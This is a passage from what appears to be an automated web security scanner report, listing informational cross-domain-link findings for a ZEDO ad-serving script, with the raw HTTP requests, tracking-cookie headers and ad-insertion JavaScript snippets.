document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.4;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903902%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=21%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=21%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.175. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.9108989179005873 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=13:14:12:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:0,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1;expires=Tue, 24 May 2011 16:48:02 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=14:14:12:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:02 GMT
Connection: close
Content-Length: 2138

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.8;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903895%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=14%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=14%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.176. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.18287896654173713 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=11:9:8:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174|2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:2,1,1:1,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:1,1,1:1,1,1;expires=Tue, 24 May 2011 16:47:39 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=9:11:9:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=163
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:47:39 GMT
Connection: close
Content-Length: 2073

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929089%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=9%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=9%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.177. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.15626525846830602 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFad=2:2:0:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732|0,1,1:0,1,1:0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732|0,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:46:16 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,3:809,1050,7:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=3:2:0:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=245
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:16 GMT
Connection: close
Content-Length: 2668

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931215%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=3%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=3%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.178. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.8832309295572303 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=18:16:16:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:16 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=17:18:16:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:16 GMT
Connection: close
Content-Length: 2093

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.30;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929081%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=17%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=17%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.179. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.3586552482197452 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=2:1:1:None; FFCap=1574B809,210132,210841|1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841|1,1,1:1,1,1;expires=Tue, 24 May 2011 16:47:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=201
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:00 GMT
Connection: close
Content-Length: 2073

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929089%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=2%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=2%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.180. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.7530534581965833 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=18:20:18:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1;expires=Tue, 24 May 2011 16:48:23 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=19:20:18:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=118
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:23 GMT
Connection: close
Content-Length: 2138

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.8;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903895%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=19%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=19%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.181. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.4845505202032985 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=50:55:50:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=51:50:55:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=100
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:14 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=51%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=51%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.182. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.680777719997637 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=7:5:4:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133|2,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133|2,1,1:1,1,1:1,1,1:0,1,1:1,1,1:1,1,1;expires=Tue, 24 May 2011 16:47:17 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:7:5:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=184
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:17 GMT
Connection: close
Content-Length: 2668

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931215%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=5%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=5%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.183. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.02735296992088576 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=43:47:43:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=44:43:47:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=116
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:49:58 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=44%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=44%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.184. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.8993099119127675 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=28:28:26:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1;expires=Tue, 24 May 2011 16:48:50 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
